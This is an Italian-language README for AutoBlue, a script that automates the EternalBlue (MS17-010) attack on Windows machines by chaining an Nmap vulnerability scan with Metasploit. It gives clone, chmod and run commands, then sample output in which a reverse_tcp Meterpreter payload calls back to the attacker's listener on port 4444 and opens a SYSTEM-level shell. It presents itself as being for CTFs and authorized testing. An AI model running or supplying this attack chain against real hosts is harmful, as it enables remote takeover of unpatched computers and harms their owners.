
AutoBlue - Strumento di sfruttamento automatizzato per EternalBlue (CVE-2017-0144 / MS17-010) che utilizza Nmap e Metasploit per ethical hacking, penetration testing e sfide CTF. Solo per uso autorizzato ed educativo!
AUTOBLUE è uno strumento di automazione progettato per sfruttare la vulnerabilità EternalBlue (CVE-2017-0144) su macchine Windows. Lo strumento integra la potenza di Nmap per la scansione delle vulnerabilità e di Metasploit's msfconsole per lo sfruttamento, consentendo agli utenti di identificare automaticamente i sistemi vulnerabili e lanciare l'exploit EternalBlue per ottenere accesso remoto al target.
Questo strumento è progettato principalmente per professionisti della sicurezza, penetration tester e hacker etici che operano in ambienti controllati e autorizzati, come sfide Capture The Flag (CTF), attività di penetration testing o configurazioni di laboratorio. AUTOBLUE consente agli utenti di sfruttare la vulnerabilità EternalBlue con un intervento manuale minimo, semplicemente inserendo l'indirizzo IP del target.
Caratteristiche
Scansione Automatica delle Vulnerabilità: Utilizza Nmap per scansionare la vulnerabilità EternalBlue (CVE-2017-0144) sulla macchina target.
Sfruttamento Senza Intoppi: Sfrutta Metasploit's msfconsole per lanciare automaticamente l'exploit EternalBlue.
Configurazione Semplice: Richiede solo un indirizzo IP target e un ambiente funzionante con Nmap e Metasploit installati.
Report di Output: Genera output che indica il successo o il fallimento del tentativo di exploit.
Indice dei Contenuti
Prerequisiti
Installazione
Utilizzo
Come Funziona
Considerazioni sulla Sicurezza
Contributi
Licenza
Riconoscimenti
Dichiarazione di non responsabilità
Prerequisiti:
Prima di utilizzare AUTOBLUE, assicurati che i seguenti strumenti siano installati sulla tua macchina:
Nmap: Uno strumento di scansione di rete per rilevare macchine vulnerabili.
Metasploit Framework: Una piattaforma di penetration testing che include exploit per EternalBlue.
Installare Nmap:
Copia il codice
sudo apt update
e
sudo apt install nmap
Su Windows o macOS, scarica Nmap dal sito ufficiale.
Installare Metasploit:
Su Linux (basato su Debian):
Copia il codice
sudo apt update
e
sudo apt install metasploit-framework
Su Windows o macOS, scarica Metasploit dal sito ufficiale.
Installazione:
Per installare AUTOBLUE, segui questi passaggi:
Clona il repository:
git clone https://github.com/AtithKhawas/autoblue.git
e
cd autoblue
Assicurati che Nmap e Metasploit siano correttamente installati come prerequisiti.
Rendi lo script eseguibile:
chmod +x autoblue.sh
Utilizzo:
AUTOBLUE è progettato per automatizzare la scansione e lo sfruttamento della vulnerabilità EternalBlue. Ecco come usarlo:
Per utilizzare AUTOBLUE, esegui il seguente comando nel tuo terminale:
Copia il codice
./autoblue.sh
Output:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - EternalBlue Exploit Automation
********************************************
********************************************
------------------------Made by ATITH KHAWAS
============================================
Enter Target IP Address:
Ti chiederà l'indirizzo IP del target e il tuo.
Esempio
Enter Target IP Address: Target<IP Address>
Enter Your IP Address: Your <IP Address>
Una volta eseguito lo strumento, inizierà la scansione con Nmap:
Output-1
Target IP Address: ***.***.**.**
[+] Scanning Target for MS17-010 Vulnerability...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
[+] Target is VULNERABLE to EternalBlue!
Qui inizia il vero lavoro, riducendo significativamente il processo che richiede tempo. Se il target è vulnerabile, avvia automaticamente Msfconsole e imposta RHOSTS, PAYLOAD, LHOST e LPORT con la porta predefinita 4444.
Output-2
[+] Launching Metasploit...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] Started reverse TCP handler on ***.***.**.**:4444
E ci fornisce la shell Meterpreter del target.
Output-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
Come Funziona:
Scansione con Script Nmap: Lo strumento utilizza prima Nmap Script Scan (--script smb-vuln-ms17-010) per rilevare se la macchina target è vulnerabile all'exploit EternalBlue. Controlla se la porta 445 è aperta e tenta di identificare vulnerabilità SMB.
Exploit Metasploit: Se la macchina target risulta vulnerabile, AUTOBLUE procede a lanciare l'exploit EternalBlue utilizzando Metasploit's msfconsole. Lo script configurerà e invierà il payload necessario per sfruttare la vulnerabilità.
Reverse Shell: Se l'exploit ha successo, verrà aperta una reverse shell per fornire un'interfaccia a riga di comando sulla macchina vittima.
Feedback: Lo strumento fornisce feedback durante tutto il processo, incluso se il target è stato sfruttato con successo, e restituisce eventuali informazioni rilevanti (ad esempio, l'indirizzo IP della reverse shell).
Considerazioni sulla Sicurezza:
Uso Legale: Questo strumento dovrebbe essere utilizzato solo in ambienti autorizzati. Assicurati di avere il permesso esplicito di testare la macchina target e che non sia illegale farlo nella tua giurisdizione.
Input dell'Utente: Assicurati che solo IP fidati vengano inseriti nello strumento per prevenire abusi. Eseguire questo strumento su sistemi non fidati potrebbe portare a incidenti di sicurezza.
Sicurezza del Payload: Il payload della reverse shell utilizzato in questo strumento è intrinsecamente rischioso. Non esporre la macchina attaccante o i suoi listener a reti non fidate.
Mantenere Aggiornate le Dipendenze: Assicurati di aggiornare regolarmente Nmap e Metasploit per mitigare vulnerabilità di sicurezza note in questi strumenti.
Contributi:
I contributi al progetto AUTOBLUE sono benvenuti. Se hai suggerimenti, miglioramenti o correzioni di bug, sentiti libero di fare il fork del repository e creare una pull request.
Licenza:
Questo strumento è open-source e distribuito sotto la licenza MIT. Sei libero di utilizzare, modificare e distribuire il software nei tuoi progetti. Tuttavia, devi includere questo avviso in tutte le copie o parti sostanziali del software.
Riconoscimenti:
Nmap: Per aver fornito la funzionalità essenziale di scansione delle vulnerabilità.
Metasploit: Per aver fornito il framework per sfruttare la vulnerabilità EternalBlue.
Ricercatori di Sicurezza: Per aver scoperto e divulgato pubblicamente la vulnerabilità EternalBlue, che ha aiutato a proteggere i sistemi in tutto il mondo.
Dichiarazione di non responsabilità:
AUTOBLUE è uno strumento destinato esclusivamente a scopi educativi ed etici. Gli autori non sono responsabili per azioni illegali intraprese utilizzando questo strumento. È tua responsabilità assicurarti di avere il permesso esplicito di eseguire penetration test su qualsiasi sistema.
Usa questo strumento a tuo rischio. Conduci sempre le attività di penetration testing in un ambiente sicuro e legale.